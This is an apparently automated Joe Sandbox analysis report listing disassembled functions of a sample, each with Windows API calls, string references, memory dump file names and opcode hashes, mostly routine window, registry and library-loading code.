Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Resource$Exception@8FindFreeH_prolog3LoadLockThrow
String ID: DR/
API String ID: 1564530344-2878275201
Opcode ID: 609b4e7f8f5ca9edb4430b604bd1a3d3c72c038cfd7740185a40e5a2082a4c84
Instruction ID: e6b0b01e11e95b85558173f6d6bb210908c59b5edbcb81afee0d6e3bd8c46cc4
Opcode Fuzzy Hash: 609b4e7f8f5ca9edb4430b604bd1a3d3c72c038cfd7740185a40e5a2082a4c84
Instruction Fuzzy Hash: 7261C474A00A46EFCB159FA6D985BBEB7B4FF04344F20846DF84697291EB70D950CB50

Function 001E3A81 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137keyboardwindowCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32(00000001), ref: 001E3AC2
WindowFromPoint.USER32(?,?), ref: 001E3B02
SendMessageW.USER32(?,00000000,?,00000000), ref: 001E3B75
ScreenToClient.USER32(?,?), ref: 001E3BD6

Strings

83/, xrefs: 001E3B24

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AsyncClientFromMessagePointScreenSendStateWindow
String ID: 83/
API String ID: 227561881-2323854675
Opcode ID: 57c4d25206b96522d4fdcd52a9bd11ba916b09745e467eea8008ddf49039726d
Instruction ID: 40dac6b2ca2b6835ff867fc9eaa83713e08271057b4700001316608925c98d8a
Opcode Fuzzy Hash: 57c4d25206b96522d4fdcd52a9bd11ba916b09745e467eea8008ddf49039726d
Instruction Fuzzy Hash: B3519171600A56AFCF18DF65C889ABEB7B5FB44700F20456BF96A97250DB30DA50CF90

Function 001D465E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,6B722804,?,?,?,?,002DADE0,000000FF), ref: 001D4714
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,?,?,002DADE0,000000FF), ref: 001D4750
RegCloseKey.ADVAPI32(?,?,?,?,?,002DADE0,000000FF), ref: 001D476B
GetPrivateProfileStringW.KERNEL32(?,?,?,?,00001000,?), ref: 001D47D4

Strings

X*1, xrefs: 001D47B3

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: QueryValue$ClosePrivateProfileString
String ID: X*1
API String ID: 1042844925-2740677128
Opcode ID: 75fd2ef4651b015c7e22ff1996a2d7697be172a46b9dbcb79c32c97c0ee94ec6
Instruction ID: 72dec97ae5dd3e67aeb8130482767eb89460a95da6e657d0c830160eadbe0715
Opcode Fuzzy Hash: 75fd2ef4651b015c7e22ff1996a2d7697be172a46b9dbcb79c32c97c0ee94ec6
Instruction Fuzzy Hash: E6413C71D00328DBCB269F14CC88E9EB7B9EF59710F10459BF519A2292CB309E95DFA1

Function 002A2B0B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110stringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 002A2B27
lstrlenW.KERNEL32(?,?,00297946,?,?), ref: 002A2B71
_wcslen.LIBCMT ref: 002A2B9B

Strings

Fy), xrefs: 002A2C10

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: GlobalLock_wcslenlstrlen
String ID: Fy)
API String ID: 2647411976-924414643
Opcode ID: 16986aaca8e3d7e7582d33b1448db2b8606b1ced6c7be357529156ac1cc19aad
Instruction ID: d5c95e20cee69fd2de13dfb33ae16e60c1c990e41ee87cee1502d0b4f0071eac
Opcode Fuzzy Hash: 16986aaca8e3d7e7582d33b1448db2b8606b1ced6c7be357529156ac1cc19aad
Instruction Fuzzy Hash: DE41E771910116EFCB18DF68C8856AEF7B5FF05304F10896AE81697141DB749E59CBA0

Function 001C7450 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 001C746A

Part of subcall function 002D858E: std::exception::exception.LIBCMT ref: 002D85A3
Part of subcall function 002D858E: __CxxThrowException@8.LIBCMT ref: 002D85B8
Part of subcall function 002D858E: std::exception::exception.LIBCMT ref: 002D85C9

std::_Xinvalid_argument.LIBCPMT ref: 001C74A7

Part of subcall function 002D8541: std::exception::exception.LIBCMT ref: 002D8556
Part of subcall function 002D8541: __CxxThrowException@8.LIBCMT ref: 002D856B
Part of subcall function 002D8541: std::exception::exception.LIBCMT ref: 002D857C

_memmove.LIBCMT ref: 001C7508

Strings

invalid string position, xrefs: 001C7465
string too long, xrefs: 001C74A2

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: e8137e6133b25084c1504456ae9526e14d5f7005e6256e13421ec09d1ef28e5c
Instruction ID: 6c9cfee7dc6be073e9c2948527649aee7f0291ad6d169b8df88867cfb320079b
Opcode Fuzzy Hash: e8137e6133b25084c1504456ae9526e14d5f7005e6256e13421ec09d1ef28e5c
Instruction Fuzzy Hash: 8531A7323082149BD7259E5CE890F6EF7A9EBB0765B24052FF145CB2C1DBB1DC508BA5

Function 001CC886 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 001CC89E
_memset.LIBCMT ref: 001CC916
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 001CC978
LoadBitmapW.USER32(00000000,00007FE3), ref: 001CC990

Strings

, xrefs: 001CC8F7

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: 88ac2b5d6b920c9fc769a132cf016b157fae166015c468d86e14ac809e2ad794
Instruction ID: de21675b395454bf134883738e43de5ee2ed3dfe5fd900614596caeb36fff60a
Opcode Fuzzy Hash: 88ac2b5d6b920c9fc769a132cf016b157fae166015c468d86e14ac809e2ad794
Instruction Fuzzy Hash: 3E31E372A002599BEB208F689CC5BA97BB8EB55314F5540AAE58DEB181DF30CD849F90

Function 001F8E9E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 001F8EB5
GetCursorPos.USER32(?), ref: 001F8EFB
SetRectEmpty.USER32(?), ref: 001F8F11
IsRectEmpty.USER32(?), ref: 001F8F3B

Strings

2, xrefs: 001F8EE1

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect$CursorState
String ID: 2
API String ID: 2369637639-3001879987
Opcode ID: 3ea0ffeeb553cd84685a5cfbea0994317f1a9c3c346b3c2d5df92ab2eccae8ee
Instruction ID: c3191423cf2550ca5642de5a8e359724731edb37569141b5480ddee30991799b
Opcode Fuzzy Hash: 3ea0ffeeb553cd84685a5cfbea0994317f1a9c3c346b3c2d5df92ab2eccae8ee
Instruction Fuzzy Hash: B6212971E1021DAFCB11DFA5DC859FEFBBDFB48B40B20042AF206E6100DB749A418BA1

Function 0021234F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00212391
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002123CC
OffsetRect.USER32(?,?,?), ref: 002123DC
CopyRect.USER32(?,?), ref: 002123EA

Strings

,, xrefs: 002123A5

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$CopyInfoOffsetParametersSystemWindow
String ID: ,
API String ID: 401166719-3772416878
Opcode ID: 4dc4878bea8727b65efc9a9a5a98cfc19f46874c774bf6d497df1dbd9c67587c
Instruction ID: c0a2b27cd3539b23a7b0086b990179556c1a31ba87f3a85c1a1ac151cfebae3f
Opcode Fuzzy Hash: 4dc4878bea8727b65efc9a9a5a98cfc19f46874c774bf6d497df1dbd9c67587c
Instruction Fuzzy Hash: 83210471A0020AABDF14DFE4D889FEEBBB9AB58310F140069F505A7150DB71A965CB61

Function 00204652 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(COMCTL32.DLL), ref: 0020466E
GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 0020467E
_memset.LIBCMT ref: 00204697

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

Strings

COMCTL32.DLL, xrefs: 00204669
TaskDialogIndirect, xrefs: 00204678

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressException@8H_prolog3HandleModuleProcThrow_memset
String ID: COMCTL32.DLL$TaskDialogIndirect
API String ID: 2638756577-244319309
Opcode ID: 08fb04d64b0f9e4f6e86345e7717bbd27c14d8be6b9b67a944b4e5896545a021
Instruction ID: 2824d7d49b3c33f7d984f9034613ffcf30f21a19faf2ddf1918fc1c298b54611
Opcode Fuzzy Hash: 08fb04d64b0f9e4f6e86345e7717bbd27c14d8be6b9b67a944b4e5896545a021
Instruction Fuzzy Hash: AF118FB2910309ABCB10EFA4CC45FCE77FCAB45714F108125B609E7181EB70DA54CBA1

Function 001C70B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001C70DF
std::exception::exception.LIBCMT ref: 001C7118

Part of subcall function 002BCB3D: std::exception::_Copy_str.LIBCMT ref: 002BCB58

__CxxThrowException@8.LIBCMT ref: 001C712D

Part of subcall function 002BF7E9: RaiseException.KERNEL32(001CA2E2,?,00000000,?,001CA2E2,?,?,001C106C,00000000), ref: 002BF82B

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001C7134

Strings

\*1, xrefs: 001C7111

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: \*1
API String ID: 73090415-2756887252
Opcode ID: 38f836b3f4b3a4ba8d91afdb6dad4949c6cf3cacd6f99d36f43ad46885136bb4
Instruction ID: 76a325c3bd1d4de15eaf4c09e9c086c39501b4c26a3a3276480b939c936169c4
Opcode Fuzzy Hash: 38f836b3f4b3a4ba8d91afdb6dad4949c6cf3cacd6f99d36f43ad46885136bb4
Instruction Fuzzy Hash: 331190B2815748AFC721DF59C880ADBFBF8FB18700F40866EE45593641DB30A604CBA4

Function 001E0FC6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(DWMAPI), ref: 001E0FF0
GetProcAddress.KERNEL32(00000000,DwmSetIconicThumbnail), ref: 001E1000
DeleteObject.GDI32(00000000), ref: 001E103A

Strings

DwmSetIconicThumbnail, xrefs: 001E0FFA
DWMAPI, xrefs: 001E0FE5

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressDeleteHandleModuleObjectProc
String ID: DWMAPI$DwmSetIconicThumbnail
API String ID: 3128169092-3761315311
Opcode ID: 38362263ab6b0c4f71c05b2fd56c511427e974d3c828d8dedaefcd4b77d09202
Instruction ID: 691f2441175caf8697a86cfb4fdd9ed22f3c697f82d576962072a0ea2de24d66
Opcode Fuzzy Hash: 38362263ab6b0c4f71c05b2fd56c511427e974d3c828d8dedaefcd4b77d09202
Instruction Fuzzy Hash: C601D231240785BBDB215F668C88EAEB7ACFF49710F004065F815A7241DFB4DD40CBA0

Function 001DCFA9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46libraryfileloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 001DCFBD
GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 001DCFCD
CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 001DD00C

Strings

kernel32.dll, xrefs: 001DCFB8
CreateFileTransactedW, xrefs: 001DCFC7

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressCreateFileHandleModuleProc
String ID: CreateFileTransactedW$kernel32.dll
API String ID: 2580138172-2053874626
Opcode ID: f037413685dfcac147477c2ba1d59d9756ae01a8ccab2987ca689532d13b7a18
Instruction ID: 16568feff6f49f74584dcac39e7619c2dbd1fa4a873bd11ee10cc8c868d1ba51
Opcode Fuzzy Hash: f037413685dfcac147477c2ba1d59d9756ae01a8ccab2987ca689532d13b7a18
Instruction Fuzzy Hash: FC01DE3204014AFB8F220F95EC04C9A7F3AEBD9B50B154616FA6595160C732C872EBA0

Function 001D18F6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 001D191F
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001D192F

Part of subcall function 001D18A2: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 001D18B6
Part of subcall function 001D18A2: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 001D18C6

Strings

RegDeleteKeyExW, xrefs: 001D1929
Advapi32.dll, xrefs: 001D191A

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyExW
API String ID: 1646373207-2191092095
Opcode ID: cd0be6e35e85e2e960d1b52e8c5a17d1b2ea158990d38406fc23234bd24f4115
Instruction ID: a365854d706de8135e02a799c50316b4da4549e257f00e54c3a25963883db548
Opcode Fuzzy Hash: cd0be6e35e85e2e960d1b52e8c5a17d1b2ea158990d38406fc23234bd24f4115
Instruction Fuzzy Hash: 67F0F431140280FFEF265F51ECA8B557F99EB05754F00442AF58AD6260CB329950D711

Function 00241D01 Relevance: 7.9, APIs: 5, Instructions: 362COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00241D68
GetWindowRect.USER32(?,?), ref: 00241E40
InflateRect.USER32(?,00000000,?), ref: 00241E66
GetWindowRect.USER32(?,?), ref: 00241F1B
GetWindowRect.USER32(?,?), ref: 00242026

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$Inflate
String ID:
API String ID: 1123775244-0
Opcode ID: 4988d7347d937d8391ec052fb2c3ef37a86d88e4f15bb36a129dd6b845e1e17a
Instruction ID: c2df8d97491c3dcbbea0db85edaaa40ec4aa9113b9208b2949cdbab7d094a6e1
Opcode Fuzzy Hash: 4988d7347d937d8391ec052fb2c3ef37a86d88e4f15bb36a129dd6b845e1e17a
Instruction Fuzzy Hash: C4E12971E1020ADFCB18DFA9C984AAEBBF5FF48300F644569E915A7240D770ADA4CF90

Function 00218CA1 Relevance: 7.8, APIs: 5, Instructions: 346windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00218CA8
GetWindow.USER32(?,00000005), ref: 00218D4D
SendMessageW.USER32(?,00000229,00000000,00000000), ref: 00218D68
GetParent.USER32(?), ref: 00218ECC
SendMessageW.USER32(?,00000222,00000000,00000000), ref: 002190A5

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSend$H_prolog3_ParentWindow
String ID:
API String ID: 3554438227-0
Opcode ID: a509f82cfcce5e437fd8285b56d7863758e4854040a17713b5f1b3fbda59104b
Instruction ID: c27e02bfcf7a1dd3c48e9792da3911a6ca287048ecd196e358d40bd018b2b596
Opcode Fuzzy Hash: a509f82cfcce5e437fd8285b56d7863758e4854040a17713b5f1b3fbda59104b
Instruction Fuzzy Hash: 6FD16871A102199FCF15EFE4C895BEDB7FAAF68310F14012AF506AB291DB709D82CB51

Function 001E8C75 Relevance: 7.8, APIs: 5, Instructions: 338COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 001E8C9D
SetRectEmpty.USER32(?), ref: 001E8D15
GetClientRect.USER32(?,?), ref: 001E8F15
GetClientRect.USER32(?,?), ref: 001E8F3D
SetRectEmpty.USER32(?), ref: 001E8FCC

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
